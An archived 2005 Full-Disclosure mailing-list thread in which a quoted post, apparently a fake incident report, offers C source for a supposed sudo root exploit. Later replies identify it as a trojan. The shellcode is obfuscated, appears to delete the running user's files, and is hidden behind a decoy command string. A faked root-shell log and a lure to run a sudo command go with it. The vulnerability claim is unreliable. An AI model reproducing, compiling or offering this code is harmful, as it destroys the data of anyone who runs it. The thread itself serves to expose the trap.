Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

From: Ron (iago_at_valhallalegends.com)
Date: 08/02/05

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-disclosure] Cisco IOS Shellcode Presentation"
    Date: Mon, 01 Aug 2005 21:57:51 -0500
    To: full-disclosure@lists.grok.org.uk
    
    

    Haha nice, I was just getting ready to run it on my sacrificial VMWare
    box, but you saved me the trouble of hitting "undo" :-)

    Kurt Seifried wrote:
    > This is a trojan that will nuke all the files owned by the user running it.
    >
    > -Kurt
    >
    > ----- Original Message ----- From: "Esler, Joel - Contractor"
    > <joel.esler@rcert-s.army.mil>
    > To: <full-disclosure@lists.grok.org.uk>
    > Sent: Saturday, July 30, 2005 12:40 PM
    > Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?
    >
    >
    >> About two weeks ago, our proprietary LIDS detected some suspicious shell
    >> activity on an internal .mil machine i am in charged of. Our server runs
    >> latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
    >> Before shutting down the machine and reinstalling it from scratch, we
    >> installed sebek module to monitor all shell activity. Based on the data
    >> we gathered, it seems the attacker gained root privileges using an
    >> undisclosed bug in latest sudo.
    >>
    >> $ uname -a
    >> Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686
    >> GNU/Linux
    >>
    >> $ sudo -V
    >> Sudo version 1.6.8p9
    >>
    >> $ ls -al /tmp/.phc
    >> -rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc
    >>
    >> Here is an excerpt of a shell session we recorded:
    >>
    >> <.........>
    >> $ cat >blaat.uue<<'EH'
    >>
    >
    >
    > --------------------------------------------------------------------------------
    >
    >
    >
    >> EH
    >> $ uudecode blaat.uue
    >> $ cat sudoh.c
    >> /*
    >> * off by one ebp overwrite in sudo prompt parsing func (bground mode
    >> only)
    >> *
    >> * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard
    >> Johnson
    >> *
    >> * gcc -pipe -o sudoh sudoh.c ; ./sudoh
    >> *
    >> * happy deathday route
    >> *
    >> */
    >>
    >> #include <stdio.h>
    >> #include <unistd.h>
    >> #include <string.h>
    >> #include <alloca.h>
    >>
    >>
    >> #define SUDO_PROMPT "%u@%h> \\%"
    >> #define shellcode esp
    >> #define RETS_NUM 246 /* generic */
    >> #define NOPS_NUM 116 /* generic */
    >>
    >>
    >> /*
    >> * Linux x86 non-interactive exec
    >> * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
    >> */
    >>
    >> char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
    >> = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    >> "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    >> "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    >> "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    >> "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    >> "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    >> "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    >> "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
    >> /* = "\xcc\xeb\xfe"; */
    >>
    >>
    >>
    >> void fill (char *buff, int size, unsigned long val)
    >> {
    >> unsigned long *ptr = (unsigned long *) buff;
    >>
    >> for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ =
    >> val;
    >> }
    >>
    >>
    >> unsigned long get_sp (void)
    >> {
    >> __asm__ ("lea esp, %eax");
    >> }
    >>
    >>
    >> char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
    >> {
    >> int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums +
    >> strlen (shellcode);
    >> unsigned char *nops = alloca (nops_nums);
    >> unsigned char *rets = alloca (rets_nums);
    >> unsigned long ret = get_sp ();
    >> static char exp_buffer [8192];
    >>
    >> /* make sure sudo isatty() fails */
    >> close (0); close (1); close (2);
    >>
    >> fill (nops, (unsigned char) nops_nums, 0x90909090);
    >> fill (rets, (unsigned char) rets_nums, ret);
    >>
    >> /* be nice plz */
    >> if (size > sizeof (exp_buffer)) {
    >> fprintf (stderr, "buffer's t00 small..\n");
    >> return NULL;
    >> }
    >>
    >> snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
    >> SUDO_PROMPT, /* evilz prompt */
    >> nops,
    >> shellcode,
    >> rets);
    >>
    >> /* exploit buff */
    >> return exp_buffer;
    >> }
    >>
    >>
    >>
    >> int main(int argv, char *argc[])
    >> {
    >> char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
    >>
    >> /* thanks again T0dd :) */
    >>
    >> execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit,
    >> "/bin/false", NULL);
    >>
    >> /* ok, shellroot should await you @ "HISTFILE=/dev/null
    >> /tmp/.phc -p" */
    >>
    >> return 0;
    >> }
    >>
    >> $ gcc -pipe -o sudoh sudoh.c
    >> {standard input}: Assembler messages:
    >> {standard input}:5: Warning: Ignoring changed section attributes for
    >> .text
    >> $ ./sudoh
    >> $ cat /bin/cat > blaat.uue; rm blaat.uue
    >> $ cat /bin/cat > sudoh.c; rm sudoh.c
    >> $ cat /bin/cat > sudoh; rm sudoh
    >> $ HISTFILE=/dev/null /tmp/.phc -p
    >> id
    >> uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
    >> <.........>
    >>
    >>
    >> Todd Miller, the maintainer of Sudo has been informed yesterday, and it
    >> is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
    >>
    >>
    >> J
    >>
    >> Joel Esler, GCIA
    >> joel.esler@rcert-s.army.mil
    >> 706-791-7165 DSN: 780-7165
    >> _______________________________________________
    >> Full-Disclosure - We believe in it.
    >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    >> Hosted and sponsored by Secunia - http://secunia.com/
    >>
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    > Hosted and sponsored by Secunia - http://secunia.com/
    >
    >
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-disclosure] Cisco IOS Shellcode Presentation"

    Relevant Pages